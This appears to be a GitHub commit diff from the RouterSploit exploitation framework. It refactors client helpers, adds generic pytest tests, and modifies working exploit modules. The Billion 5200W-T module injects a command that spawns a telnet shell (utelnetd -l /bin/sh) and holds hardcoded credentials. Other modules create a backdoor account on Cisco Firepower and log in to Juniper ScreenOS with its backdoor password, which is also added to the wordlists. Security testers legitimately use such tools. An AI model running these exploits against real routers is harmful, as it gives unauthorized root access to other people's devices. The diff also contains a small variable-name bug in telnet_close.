Unverified Commit 8800e62d by Marcin Bury Committed by GitHub

Adding generic tests (#418)

parent 28246ef8
......@@ -8,7 +8,7 @@ from routersploit.core.exploit.option import OptBool
from routersploit.core.exploit.printer import print_error
FTP_TIMEOUT = 30.0
FTP_TIMEOUT = 8.0
class FTPClient(Exploit):
......@@ -71,3 +71,9 @@ class FTPClient(Exploit):
return fp_content.getvalue()
return None
def ftp_close(self, ftp_client):
if ftp_client:
ftp_client.close()
return None
......@@ -7,6 +7,9 @@ from routersploit.core.exploit.printer import print_success
from routersploit.core.exploit.printer import print_error
SNMP_TIMEOUT = 15.0
class SNMPClient(Exploit):
""" SNMP Client exploit """
......@@ -14,13 +17,13 @@ class SNMPClient(Exploit):
verbosity = OptBool("true", "Enable verbose output: true/false")
def snmp_get(self, community_string, oid, version=1):
def snmp_get(self, community_string, oid, version=1, retries=0):
cmdGen = cmdgen.CommandGenerator()
try:
errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd(
cmdgen.CommunityData(community_string, mpModel=version),
cmdgen.UdpTransportTarget((self.target, self.port)),
cmdgen.UdpTransportTarget((self.target, self.port), timeout=SNMP_TIMEOUT, retries=retries),
oid,
)
except Exception:
......
......@@ -183,3 +183,9 @@ class SSHClient(Exploit):
except Exception as err:
print_error("Err: {}".format(err))
def ssh_close(self, ssh_client):
if ssh_client:
ssh_client.close()
return None
......@@ -76,3 +76,5 @@ class TCPClient(Exploit):
def tcp_close(self, tcp_client):
if tcp_client:
tcp_client.close()
return None
......@@ -94,3 +94,9 @@ class TelnetClient(Exploit):
return telnet_client.write(data, 5)
return None
def telnet_close(self, telnete_client):
if telnet_client:
telnet_client.close()
return None
......@@ -45,9 +45,13 @@ class UDPClient(Exploit):
return str(response, "utf-8")
except socket.timeout:
print_error("Socket did timeout")
except socket.error:
print_error("Socket err")
return None
def udp_close(self, udp_client):
if udp_client:
udp_client.close()
return None
import telnetlib
from routersploit.core.exploit import *
from routersploit.core.tcp.tcp_client import TCPClient
from routersploit.core.http.http_client import HTTPClient
from routersploit.core.telnet.telnet_client import TelnetClient
class Exploit(TCPClient):
class Exploit(HTTPClient, TelnetClient):
__info__ = {
"name": "Billion 5200W-T RCE",
"description": "Module exploits Remote Command Execution vulnerability in Billion 5200W-T devices. "
......@@ -32,31 +32,42 @@ class Exploit(TCPClient):
def __init__(self):
# hardcoded credentials
creds = [
self.creds = [
("admin", "password"),
("true", "true"),
("user3", "12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678")
("user3", "12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678"),
]
def run(self):
cmd = "utelnetd -l /bin/sh -p {} -d".format(self.telnet_port)
if self.execute1(cmd) or self.execute2(cmd):
self.telnet_connect()
print_status("Trying to connect to the telnet server...")
telnet_client = self.telnet_connect(port=self.telnet_port)
if telnet_client:
self.telnet_interactive(telnet_client)
self.telnet_close(telnet_client)
else:
print_error("Exploit failed - Telnet connection error: {}:{}".format(self.target, self.telnet_port))
else:
print_error("Exploit failed")
def execute1(self, cmd):
print_status("Trying to exploit first command injection vulnerability...")
url = "{}:{}/cgi-bin/adv_remotelog.asp".format(self.target, self.port)
payload = "1.1.1.1;{};#".format(cmd)
data = {"RemotelogEnable": "1",
"syslogServerAddr": payload,
"serverPort": "514"}
data = {
"RemotelogEnable": "1",
"syslogServerAddr": payload,
"serverPort": "514"
}
response = http_request(method="POST", url=url, data=data)
response = self.http_request(
method="POST",
path="/cgi-bin/adv_remotelog.asp",
data=data,
)
if response is not None and response.status_code != 404:
return True
......@@ -71,65 +82,63 @@ class Exploit(TCPClient):
for creds in set(self.creds + [(self.username, self.password)]):
print_status("Trying exploitation with creds: {}:{}".format(creds[0], creds[1]))
# Fixate cookie
url = "{}:{}/".format(self.target, self.port)
cookies = {
"SESSIONID": utils.random_text(8)
}
response = http_request(method="GET", url=url, cookies=cookies, auth=(creds[0], creds[1]))
response = self.http_request(
method="GET",
path="/",
cookies=cookies,
auth=(creds[0], creds[1]),
)
if response is None:
return False
# Inject command
url = "{}:{}/cgi-bin/tools_time.asp".format(self.target, self.port)
payload = "\"%3b{}%26%23".format(cmd)
data = {"SaveTime": "1",
"uiCurrentTime2": "",
"uiCurrentTime1": "",
"ToolsTimeSetFlag": "0",
"uiRadioValue": "0",
"uiClearPCSyncFlag": "0",
"uiwPCdateMonth": "0",
"uiwPCdateDay": "",
"&uiwPCdateYear": "",
"uiwPCdateHour": "",
"uiwPCdateMinute": "",
"uiwPCdateSec": "",
"uiCurTime": "N/A+(NTP+server+is+connecting)",
"uiTimezoneType": "0",
"uiViewSyncWith": "0",
"uiPCdateMonth": "1",
"uiPCdateDay": "",
"uiPCdateYear": "",
"uiPCdateHour": "",
"uiPCdateMinute": "",
"uiPCdateSec": "",
"uiViewdateToolsTZ": "GMT+07:00",
"uiViewdateDS": "Disable",
"uiViewSNTPServer": payload,
"ntp2ServerFlag": "N/A",
"ntp3ServerFlag": "N/A"}
response = http_request(method="POST", url=url, cookies=cookies, data=data, auth=(creds[0], creds[1]))
data = {
"SaveTime": "1",
"uiCurrentTime2": "",
"uiCurrentTime1": "",
"ToolsTimeSetFlag": "0",
"uiRadioValue": "0",
"uiClearPCSyncFlag": "0",
"uiwPCdateMonth": "0",
"uiwPCdateDay": "",
"&uiwPCdateYear": "",
"uiwPCdateHour": "",
"uiwPCdateMinute": "",
"uiwPCdateSec": "",
"uiCurTime": "N/A+(NTP+server+is+connecting)",
"uiTimezoneType": "0",
"uiViewSyncWith": "0",
"uiPCdateMonth": "1",
"uiPCdateDay": "",
"uiPCdateYear": "",
"uiPCdateHour": "",
"uiPCdateMinute": "",
"uiPCdateSec": "",
"uiViewdateToolsTZ": "GMT+07:00",
"uiViewdateDS": "Disable",
"uiViewSNTPServer": payload,
"ntp2ServerFlag": "N/A",
"ntp3ServerFlag": "N/A",
}
response = self.http_request(
method="POST",
path="/cgi-bin/tools_time.asp",
cookies=cookies,
data=data,
auth=(creds[0], creds[1]),
)
if response is None:
return False
return True
def telnet_connect(self):
target = self.target.replace("http://", "").replace("https://", "")
print_status("Trying to connect to the telnet server...")
try:
tn = telnetlib.Telnet(target, self.telnet_port)
tn.interact()
tn.close()
except:
print_error("Exploit failed - Telnet connection error: {}:{}".format(target, self.telnet_port))
@mute
def check(self):
# it is not possible to check if the target is vulnerable without exploiting device
......
......@@ -8,7 +8,7 @@ class Exploit(HTTPClient):
__info__ = {
"name": "Billion 7700NR4 Password Disclosure",
"description": "Exploits Billion 7700NR4 password disclosure vulnerability that allows to "
"fetch credentials for admin account",
"fetch credentials for admin account.",
"authors": (
"R-73eN", # vulnerability discovery
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
......
......@@ -81,7 +81,7 @@ class Exploit(HTTPClient):
data = {
"username": self.username,
"password": self.password,
"target": ""
"target": "",
}
response = self.http_request(
......
import requests
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
from routersploit.core.ssh.ssh_client import SSHClient
class Exploit(SSHClient, HTTPClient):
class Exploit(HTTPClient, SSHClient):
__info__ = {
"name": "Cisco Firepower Management 6.0 RCE",
"description": "Module exploits Cisco Firepower Management 6.0 Remote Code Execution vulnerability. "
"If the target is vulnerable, it is create backdoor account and authenticate through SSH service.",
"authors": (
"Matt", # vulnerability discovery
"sinn3r", # Metasploit module
"sinn3r", # metasploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
"references": (
......@@ -24,6 +25,8 @@ class Exploit(SSHClient, HTTPClient):
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(443, "Target HTTP port")
ssl = OptBool("true", "SSL enabled: true/false")
ssh_port = OptPort(22, "Target SSH Port")
username = OptString("admin", "Default username to log in")
......@@ -63,17 +66,8 @@ class Exploit(SSHClient, HTTPClient):
)
if response is not None and response.status_code == 200:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
target = self.target.replace("http://", "").replace("https://", "")
try:
ssh.connect(target, self.ssh_port, timeout=5, username=utils.random_text(8), password=utils.random_text(8))
except paramiko.AuthenticationException:
return True # target is vulnerable
except:
pass
if self.ssh_test_connect(port=self.ssh_port):
return True # target is vulnerable
return False # target is not vulnerable
......@@ -153,16 +147,7 @@ class Exploit(SSHClient, HTTPClient):
def init_ssh_session(self, username, password):
print_status("Trying to authenticate through SSH with username: {} password:{} account".format(username, password))
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
target = self.target.replace("http://", "").replace("https://", "")
try:
ssh.connect(target, self.ssh_port, timeout=5, username=username, password=password)
except:
ssh.close()
else:
ssh_client = self.ssh_login(username, password)
if ssh_client:
print_success("SSH - Successful authentication")
ssh_interactive(ssh)
return
ssh_interactive(ssh_client)
......@@ -34,7 +34,7 @@ class Exploit(HTTPClient):
)
if response is None:
return False # target is not vulnerable
return
res = []
for option in self.opts:
......
from routersploit.core.exploit import *
from routersploit.core.ssh.ssh_client import SSHClient
from routersploit.core.telnet.telnet_client import TelnetClient
class Exploit(TelnetClient):
__info__ = {
'name': 'Juniper ScreenOS Backdoor',
'description': 'Module exploits Juniper ScreenOS Authentication Backdoor vulnerability. If the target is is possible to authentiate to the device.',
'authors': (
'hdm', # vulnerability discovery
'Marcin Bury <marcin[at]threat9.com>', # routersploit module
),
'references': (
'https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor',
),
'devices': (
'Juniper ScreenOS 6.2.0r15 to 6.2.0r18',
'Juniper ScreenOS 6.3.0r12 to 6.3.0r20',
)
}
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(22, "Target SSH port")
telnet_port = OptPort(23, "Target Telnet port")
def __init__(self):
self.username = "admin"
self.password = "<<< %s(un='%s') = %u"
def run(self):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(self.target, self.ssh_port, timeout=5, username=self.username, password=self.password)
except:
ssh.close()
else:
print_success("SSH - Successful authentication")
ssh_interactive(ssh)
return
try:
tn = telnetlib.Telnet(self.target, self.telnet_port)
tn.write("\r\n")
tn.expect(["Login: ", "login: "], 5)
tn.write(self.username + "\r\n")
tn.expect(["Password: ", "password"], 5)
tn.write(self.password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Failed", "failed"], 5)
if i != -1:
return False
else:
if any(map(lambda x: x in res, ["#", "$", ">"])):
print_success("Telnet - Successful authentication")
tn.write("\r\n")
tn.interact()
tn.close()
except:
print_error("Connection Error")
return
@mute
def check(self):
return False
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(self.target, self.ssh_port, timeout=5, username=self.username, password=self.password)
except:
ssh.close()
else:
return True
try:
tn = telnetlib.Telnet(self.target, self.telnet_port)
tn.write("\r\n")
tn.expect(["Login: ", "login: "], 5)
tn.write(self.username + "\r\n")
tn.expect(["Password: ", "password"], 5)
tn.write(self.password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Failed", "failed"], 5)
tn.close()
if i != -1:
return False
else:
if any(map(lambda x: x in res, ["#", "$", ">"])):
tn.close()
return True
tn.close()
except:
return False
return False
......@@ -135,6 +135,7 @@ acc:acc
adfexc:adfexc
admin2:changeme
admin:
admin:<<< %s(un='%s') = %u
admin:0
admin:0000
admin:1111
......
......@@ -63,6 +63,7 @@ $secure$
8429
987654321
9999
<<< %s(un='%s') = %u
@dsl_xilno
ADMINISTRATOR
ADTRAN
......
import pytest
from routersploit.core.exploit.utils import iter_modules
directory = "./routersploit/modules/exploits/"
@pytest.mark.parametrize("module", iter_modules(directory))
def test_exploit_trash_response(trash_target, module):
exploit = module()
exploit.target = trash_target.host
exploit.port = trash_target.port
assert exploit.check() in [True, False, None]
@pytest.mark.parametrize("module", iter_modules(directory))
def test_exploit_empty_response(empty_target, module):
exploit = module()
exploit.target = empty_target.host
exploit.port = empty_target.port
assert exploit.check() in [True, False, None]
@pytest.mark.parametrize("module", iter_modules(directory))
def test_exploit_not_found_response(not_found_target, module):
exploit = module()
exploit.target = not_found_target.host
exploit.port = not_found_target.port
assert exploit.check() in [True, False, None]
@pytest.mark.parametrize("module", iter_modules(directory))
def test_exploit_empty_response(error_target, module):
exploit = module()
exploit.target = error_target.host
exploit.port = error_target.port
assert exploit.check() in [True, False, None]
@pytest.mark.parametrize("module", iter_modules(directory))
def test_exploit_empty_response(redirect_target, module):
exploit = module()
exploit.target = redirect_target.host
exploit.port = redirect_target.port
assert exploit.check() in [True, False, None]
@pytest.mark.parametrize("module", iter_modules(directory))
def test_exploit_timeout_response(timeout_target, module):
exploit = module()
exploit.target = timeout_target.host
exploit.port = timeout_target.port
assert exploit.check() in [True, False, None]
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment